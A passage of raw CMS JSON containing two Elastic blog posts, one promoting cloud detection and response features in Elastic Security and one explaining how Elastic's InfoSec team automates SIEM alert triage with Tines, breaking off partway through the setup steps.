(CDR)\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e tool by being the first to integrate cloud detection and response capabilities directly into an \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eAI-driven security analytics \u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003esolution — the future of SIEM. Legacy solutions have complex workflows and lack cloud-specific context, making them inadequate for the scale and complexity of cloud environments. Standalone CDR tools often generate vast amounts of fragmented data that are difficult to analyze in real time and fail to correlate threats across diverse data sources. CDR is key to actively finding and addressing cloud-based threats quickly. Elastic Security ensures seamless, real-time incident response, empowering organizations to efficiently manage and secure their cloud workloads.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOver the past two years, we’ve integrated cloud security and CDR capabilities directly into the SIEM, enhancing how modern organizations detect and respond to threats more effectively. In \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/whats-new-elastic-security-8-12-0\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Security 8.12\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, we launched cloud security posture management (CSPM) capabilities for all cloud security providers (CSPs) — AWS, Microsoft Azure, and Google Cloud Platform (GCP) — laying the foundation for streamlined cloud security posture. With \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/whats-new-elastic-security-8-16-0\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Security 8.16\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, we’ve expanded these capabilities to meet the growing customer demands for advanced analytics and cloud security across diverse cloud assets, including third-party, cloud-native application protection platforms (CNAPP), vulnerability management tools, and open source \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/falco-elastic-security-cloud-workload-protection\"\u003e\u003cspan style='font-size: 12pt;'\u003eCloud Native Computing Foundation (CNCF) tools\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Combining core CDR capabilities into a SIEM","_metadata":{"uid":"cs1b7820b632af31e9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eToday, we are delivering new features like agentless ingestion, cloud asset inventory, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-integrates-leading-cloud-security-vendors\"\u003e\u003cspan style='font-size: 12pt;'\u003eextended protections\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, and graph view that enables out-of-the-box correlation and context enrichment using customers’ existing data. All of these features are powered by the Elastic Search AI Platform that provides the visibility, context, and security needed for cloud, hybrid, and on-prem environments — all from within a single platform.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“Increasingly dynamic cloud environments are presenting visibility challenges for security with 44% reporting that threat detection and response is more difficult to conduct in cloud environments,\" said Dave Gruber, principal security analyst at ESG. “SOC teams need to address this cloud visibility gap by collecting, processing, monitoring, and acting upon information from an assortment of cloud security telemetry sources spanning multiple hyperscale cloud providers. Elastic Security’s vendor-agnostic approach to CDR, with the ability to easily ingest and normalize cloud data out of the box, enables security teams to surface critical insights at the speed and scale of the cloud directly with their SIEM.”\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“We combined CDR and AI-driven security analytics to reduce tool fragmentation and centralize data, empowering the security teams to protect their cloud environments effectively,” said Santosh Krishnan, general manager of Elastic solutions. “This comprehensive approach maximizes efficiency, lowers the total cost of ownership (TCO), and alleviates the burden on security teams. Ultimately, Elastic Security ensures organizations stay ahead of evolving threats while leveraging the full benefits of CDR.”\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Security simplifies threat detection by empowering practitioners to uncover hidden insights and connect the dots through context-rich investigations, such as graph view. This visual approach enables analysts to easily identify relationships between entities, events, and actions from sources like cloud audit logs, flow logs, identity logs, and third-party cloud security context.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBy visualizing this data, analysts can quickly detect patterns and pinpoint root causes without writing complex queries or manually piecing together data from multiple tabular views. Initially available in Elastic Cloud Serverless deployments for AWS CloudTrail, this capability will soon expand to other environments and data sources — further enhancing investigation efficiency and accelerating threat detection.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csee6bcaeff684aaa1"}}},{"image":{"image":{"uid":"blt02dbfabda1ada0e5","_version":1,"title":"image3.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-02T18:12:16.335Z","updated_at":"2024-12-02T18:12:16.335Z","content_type":"image/png","file_size":"400962","filename":"image3.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-03T14:11:32.557Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt02dbfabda1ada0e5/674df88083dc3e614fb79093/image3.png"},"_metadata":{"uid":"csed6effda1ceec52c"},"caption_l10n":"Visualize user activity: When an AWS CloudTrail log deletion alert triggers, see how you can visualize the user and action and explore other related actions performed by the user.","alt_text_l10n":"visualizing user activity ","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs316cebbd0d0e8ec9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Security simplifies deployment with agentless data integration, enabling analysts and practitioners to start collecting cloud data in minutes without the need for installation on customer environments. This reduces operational overhead while providing a comprehensive view across multi-cloud environments, ensuring that security teams can keep pace with the rapid growth of cloud resources. Currently, Elastic supports agentless deployment for CSPM and the new asset discovery integration — now in public beta — with additional integration coming soon.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9534509cfe10857b"}}},{"image":{"image":{"uid":"blt14684e3cffa2ce33","_version":1,"title":"image1.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-02T18:15:01.785Z","updated_at":"2024-12-02T18:15:01.785Z","content_type":"image/png","file_size":"137208","filename":"image1.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-03T14:11:32.616Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt14684e3cffa2ce33/674df925de20c0469ad2f63e/image1.png"},"_metadata":{"uid":"csab539b8c6bb6de47"},"caption_l10n":"Selecting the agentless ingestion option instantly sets up the integration with the cloud provider without any installation.","alt_text_l10n":"agentless ingestion option","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs4172590ded2693aa"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Security addresses the issue of tool fragmentation and lack of comprehensive context by integrating data from leading cloud security and open source \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-integrates-leading-cloud-security-vendors\"\u003e\u003cspan style='font-size: 12pt;'\u003eCNCF tools like Wiz, Falco\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e,\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and AWS Security Hub\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. The extended protection integrations bring together insights, such as vulnerabilities from Wiz, alerts from \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/falco-elastic-security-cloud-workload-protection\"\u003e\u003cspan style='font-size: 12pt;'\u003eFalco\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, and posture findings from AWS Security Hub, alongside the affected entities. This comprehensive view enables practitioners to quickly assess the full risk context and prioritize their response effectively.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis data-centric approach offers vendor-agnostic classifications, rules, and workflows, streamlining investigations and boosting productivity.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd0fd2e4ad896f28e"}}},{"image":{"image":{"uid":"bltee657457a77b2b39","_version":1,"title":"image2.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-02T18:17:12.820Z","updated_at":"2024-12-02T18:17:12.820Z","content_type":"image/png","file_size":"227153","filename":"image2.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-03T14:11:32.812Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltee657457a77b2b39/674df9a831c3826fef8d3539/image2.png"},"_metadata":{"uid":"csda3a9c02e0c73b00"},"caption_l10n":"","alt_text_l10n":"configuration finding","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs89d87e2ffe9dd886"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn this example, we can see a configuration finding indicating that this host has a public IPv4 address coming from AWS Security Hub,\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003ewhich Elastic has seamlessly integrated and normalized into the workflow.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBy taking care of ingesting data from sources like AWS Security Hub, Wiz, and others, normalizing it, and surfacing it in the right place, Elastic ensures that — regardless of the source — this data is actionable. Analysts don’t need to jump between platforms or spend time deciphering raw data. Instead, they’re empowered to contextually investigate and respond to detected threats all within their existing workflow.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Building off foundational CDR capabilities","_metadata":{"uid":"csb46e268b55d8b9a9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThese enhancements build on Elastic Security’s robust foundation, which already includes over 200 prebuilt cloud detection rules and anomaly detection jobs, more than 100 cloud integrations, runtime security powered by eBPF, and automated response actions. Together, these features provide security teams with the tools they need to stay ahead of evolving threats and secure their cloud environments with confidence.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Try it out","_metadata":{"uid":"cs3a812194b5cf0bbc"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo see this new technology in action, join us at \u003c/span\u003e\u003ca href=\"https://www.elastic.co/events/aws-reinvent\"\u003e\u003cspan style='font-size: 12pt;'\u003eAWS re:Invent booth #1132\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, or sign up for our webinar, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/virtual-events/streamline-cloud-detection-and-response\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eMaximize your investment: Streamline Cloud Detection and Response with Elastic Security\u003c/em\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003e\u003cem\u003e.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003eExisting Elastic Cloud customers can access many of these features directly from the \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud console\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003e. Not taking advantage of Elastic on the cloud? \u003c/span\u003e\u003ca href=\"https://www.elastic.co/cloud/cloud-trial-overview\"\u003e\u003cspan style='font-size: 12pt;'\u003eStart a free trial\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"","_metadata":{"uid":"cse44ab118950dac6c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs4de310dc49d925ae"}}}],"publish_date":"2024-12-03","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Elastic Security simplifies cloud detection and response","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"Delivering more cloud detection and response features directly into our SIEM","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt39140cf3e2cd4550","ACL":{},"created_at":"2023-11-06T21:51:00.583Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"integrations","label_l10n":"Integrations","tags":[],"title":"Integrations","updated_at":"2023-11-06T21:51:00.583Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.083Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[{"uid":"blt4dcd56f8b3372448","_content_type_uid":"tags_partner"}],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt2d51fc8cada40465","ACL":{},"created_at":"2023-11-06T20:35:57.040Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-security","label_l10n":"Cloud security","tags":[],"title":"Cloud security","updated_at":"2023-11-06T20:35:57.040Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.295Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt43ad419de732b584","ACL":{},"created_at":"2023-11-06T21:31:46.367Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-analytics","label_l10n":"Security analytics","tags":[],"title":"Security analytics","updated_at":"2023-11-06T21:31:46.367Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.534Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt6f00e40aaa5c6f0e","ACL":{},"created_at":"2020-06-17T03:32:57.128Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"siem","label_l10n":"SIEM","tags":[],"title":"SIEM","updated_at":"2020-07-06T22:20:05.385Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.450Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt6b18be3ad7ab6fa1","_version":1,"title":"elastic-de-142024-blogheaderimage-V6_V1 (1).jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-02T18:21:58.156Z","updated_at":"2024-12-02T18:21:58.156Z","content_type":"image/jpeg","file_size":"134474","filename":"elastic-de-142024-blogheaderimage-V6_V1_(1).jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-03T14:11:32.597Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6b18be3ad7ab6fa1/674dfac6de20c01d10d2f64f/elastic-de-142024-blogheaderimage-V6_V1_(1).jpg"},"title":"Finally, a SIEM that gets cloud detection and response","title_l10n":"Finally, a SIEM that gets cloud detection and response","updated_at":"2024-12-09T17:01:03.305Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/siem-cloud-detection-and-response","publish_details":{"time":"2024-12-09T17:01:08.791Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt5ad790f6beb56236","_version":8,"locale":"en-us","ACL":{},"abstract_l10n":"Discover how Elastic's InfoSec team saves thousands of hours per month by using Tines to automate SIEM alert investigations while reducing false positives and detect compromised accounts.","author":["blt06048a64b0c2b959"],"category":["blte5cc8450a098ce5e"],"created_at":"2024-05-28T18:53:22.496Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csb04ce88972994526"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOne of the biggest SIEM management problems SOC teams face is that they are often overwhelmed by false positives, leading to analyst fatigue and visibility gaps. In addition to that, one of the toughest challenges in security is detecting when SaaS access tokens are compromised without adding to the false positive problem.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAt Elastic, the InfoSec team tackles both of these issues by automating SIEM alert investigations with tools like \u003c/span\u003e\u003ca href=\"https://www.tines.com/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eTines\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. This blog post shares how we've streamlined our workflows, reduced false positives, and empowered our analysts to focus on real threats.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Automating SIEM alert initial investigation","_metadata":{"uid":"cs4cdf1f9ad549d27d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn a previous \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/detecting-account-compromise-ueba-detection-packages\"\u003e\u003cspan style='font-size: 12pt;'\u003eblog post\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, we wrote about how the Elastic InfoSec team created rule packages that detected \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/user-behavior-analytics\"\u003e\u003cspan style='font-size: 12pt;'\u003euser and entity behavior analytics (UEBA)\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. As we expanded these alert packages to include more data sources, we found that we were overloading SOC analysts with a high level of false positives caused by anomalous but benign activity — for example, API token activity that only happened once per month or from a known scanner. This led to a problem where we had to decide whether to create a detection rule that may be noisy from false positives, or accept that there will be a visibility gap from not having that detection. A noisy detection that has a lot of false positives creates its own type of visibility gap due to analyst fatigue. But this problem sparked a new thought: what if we could automate the initial investigation of an alert, closing the known false positives and escalating those we can’t close?\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe found that for many of our SaaS provider and UEBA detection rules, we could close the rule if the activity came from a trusted device such as one of our managed workstations. The initial investigation playbook action in many cases is to use a piece of information from the original alert, such as the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003esource.ip\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, and then query other index patterns in Elasticsearch for that \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003esource.ip\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. If there are any results to the query, the alert can be closed as a false positive. For example, if you see a UEBA alert for AWS Secret Key activity we would then run the following group of queries to triage the alert to see if the activity is from a trusted device:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAre there proxy logs showing the Elastic Agent successfully connecting to our fleet server from a workstation or server with that \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003esource.ip\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e?\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDoes that \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003esource.ip\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e belong to the public IP range of one of the AWS, GCP, or Azure network zones that we manage and control?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDoes the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003esource.ip\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e belong to an authorized third-party application such as Okta, Terraform, Tines, Qualys, or Snyk?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHave there been any successful FIDO2 SSO logins from that \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003esource.ip\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e in the past 2 hours?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf any of these follow-on Elasticsearch queries returns results, then we can assume that this AWS API key activity is likely to be authorized and we can close the alert. If all of these queries return zero results, we believe that the activity is suspicious so we escalate it to a SOC team member for further investigation. All of the above Elasticsearch queries can be completed using the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/search-your-data.html\"\u003e\u003cspan style='font-size: 12pt;'\u003e_search\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e API, and we can use the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/signals-api-overview.html#_set_alert_status\"\u003e\u003cspan style='font-size: 12pt;'\u003eSignals API\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to close and tag the alerts, which allows us to automate the whole process.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBy sending our SIEM detections from Elastic to a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/soar\"\u003e\u003cspan style='font-size: 12pt;'\u003esecurity orchestration, automation, and response (SOAR)\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e system using the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-create.html#rule-notifications\"\u003e\u003cspan style='font-size: 12pt;'\u003eAlert Actions\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e feature, we can use our SOAR to automatically run these investigation queries for every applicable alert. Based on the results of the queries, we can automatically close the alert or escalate it to an analyst.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis automated triage capability allows us to create entire classes of detections that would normally be far too noisy to investigate without a dramatic increase in the number of SOC personnel. Our automated workflow is currently triaging and closing over 3,000 alerts per day without any human interaction. It would take an experienced analyst over 15 minutes \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eper alert\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to triage in the same way. If we wanted to have the same detections without this automation, we would need an additional 94 full-time employees. This chart shows our numbers for the last 30 days of alerts in our SIEM:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csf87653e8570243e7"}}},{"image":{"image":{"uid":"bltc80752b0c3e4b095","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-05-29T15:40:03.477Z","created_by":"bltb6c155cd84fc0c1a","file_size":"63277","filename":"1.png","parent_uid":null,"tags":[],"title":"1.png","updated_at":"2024-05-29T15:40:03.477Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-05-31T13:00:02.054Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc80752b0c3e4b095/66574c5386ba8b05c21d6fdd/1.png"},"_metadata":{"uid":"cs5c32fcec0551516c"},"caption_l10n":"30 days of alerts","alt_text_l10n":"30 days of alerts","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cse324fac03125ed8e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis automated triage workflow could be created using custom scripts, but this blog will show you how to build this automation with \u003c/span\u003e\u003ca href=\"https://www.tines.com/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eTines\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. We’ve decided to explore it this way because it’s what the Elastic InfoSec team uses and, simply put, it’s easier than scripting. We have found that Tines makes it easy to build and modify automations without having a dedicated development team.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Sending the alerts to any SOAR","_metadata":{"uid":"csc9a675e2af700970"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs mentioned above, the first step is to get the alert content out of Elastic Security and over to your SOAR solution of choice. To do this we use the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/rules-ui-create.html#rule-notifications\"\u003e\u003cspan style='font-size: 12pt;'\u003eAlert Actions\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e feature in Elastic Security, which will take a custom action every time an alert is triggered.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen configuring a detection rule there is an option to add a Rule Action. From here you can select the desired \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/action-types.html\"\u003e\u003cspan style='font-size: 12pt;'\u003econnector type\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5257a2b85f272682"}}},{"image":{"image":{"uid":"bltbd335a6577d14fc2","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-05-29T15:40:38.047Z","created_by":"bltb6c155cd84fc0c1a","file_size":"38458","filename":"2.png","parent_uid":null,"tags":[],"title":"2.png","updated_at":"2024-05-29T15:40:38.047Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-05-31T13:00:02.213Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltbd335a6577d14fc2/66574c76672d197ef5dc98e2/2.png"},"_metadata":{"uid":"cs81bb53ac48ff9608"},"caption_l10n":"Rule action connector selection view","alt_text_l10n":"Rule action connector selection 